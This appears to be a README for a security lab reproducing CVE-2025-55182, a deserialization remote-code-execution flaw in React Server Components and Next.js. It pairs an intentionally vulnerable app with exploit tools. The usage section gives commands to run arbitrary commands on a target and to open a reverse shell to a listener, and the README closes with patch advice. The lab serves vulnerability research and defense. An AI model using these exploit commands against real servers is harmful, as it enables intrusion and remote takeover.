## https://sploitus.com/exploit?id=953C5BFD-21F9-57EB-BB21-C33DB12B5F62
# CVE-2025-55182 (React2Shell) Vulnerability Analysis Lab
This repository contains a complete environment for analyzing and reproducing **CVE-2025-55182**, a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) affecting React 19.x and Next.js 15.x.
**โ ๏ธ WARNING: This project intentionally contains vulnerable code. DO NOT deploy this to a public server or production environment.**
## ๐ Vulnerability Overview
- **CVE ID:** CVE-2025-55182
- **Alias:** React2Shell
- **CVSS Score:** 10.0 (CRITICAL)
- **Vulnerability Type:** CWE-502 (Deserialization of Untrusted Data)
- **Affected Components:**
- React Server Components (19.0.0 - 19.2.0)
- Next.js (15.0.0 - 16.0.7)
- `react-server-dom-webpack`, `react-server-dom-turbopack`
### Mechanism
The vulnerability exists in how the React Server Components runtime processes serialized data from HTTP requests (Server Actions). An attacker can craft a malicious "Flight" protocol payload that, when deserialized by the server, executes arbitrary code before authentication checks occur.
## ๐ Project Structure
```
react2shell/
โโโ vulnerable-app/ # Vulnerable Next.js 15 application
โ โโโ app/
โ โ โโโ actions.ts # Vulnerable Server Actions
โ โ โโโ page.tsx # UI for testing vulnerability
โ โโโ Dockerfile # Container definition
โ โโโ package.json
โโโ exploit/ # Exploit tools
โ โโโ exploit.py # Python PoC exploit
โ โโโ scanner.py # Vulnerability scanner
โ โโโ quick_exploit.sh # Simple bash exploit
โโโ docs/ # Analysis documentation
โโโ docker-compose.yml # Isolated lab environment
```
## ๐ Getting Started
### Prerequisites
- Docker & Docker Compose
- Python 3.x (for running exploits locally)
### 1. Start the Lab Environment
Run the vulnerable application in an isolated container:
```bash
docker-compose up -d --build
```
The application will be available at `http://localhost:3000`.
### 2. Verify the Application
Visit `http://localhost:3000` in your browser. You should see the "React2Shell Lab" interface with several testing panels:
- **Command Execution:** Test direct command injection
- **Unsafe Deserialization:** Test JSON-based deserialization exploits
- **Arbitrary File Read:** Test path traversal
- **System Info:** View system details (to verify RCE impact)
## โ๏ธ Exploitation
We provide several tools to test the vulnerability.
### Using the Python Exploit
1. Install requirements:
```bash
pip install -r exploit/requirements.txt
```
2. Check if vulnerable:
```bash
python3 exploit/exploit.py -u http://localhost:3000 --check
```
3. Execute a command:
```bash
python3 exploit/exploit.py -u http://localhost:3000 -c "id"
```
4. Reverse Shell (requires a listener, e.g., `nc -lvnp 4444`):
```bash
python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
```
### Using the Scanner
Scan for vulnerable React/Next.js instances:
```bash
python3 exploit/scanner.py -u http://localhost:3000
```
## ๐ก๏ธ Mitigation
To fix this vulnerability in your own applications:
1. **Upgrade Dependencies:**
- Upgrade React to version **19.3.0** or later.
- Upgrade Next.js to version **15.0.5**, **15.1.9**, or **16.0.8** depending on your branch.
2. **Verify Patch:**
Check `package.json` to ensure `react-server-dom-*` packages are updated.
## ๐ Disclaimer
This project is for educational purposes and security research only. The authors take no responsibility for the misuse of this material.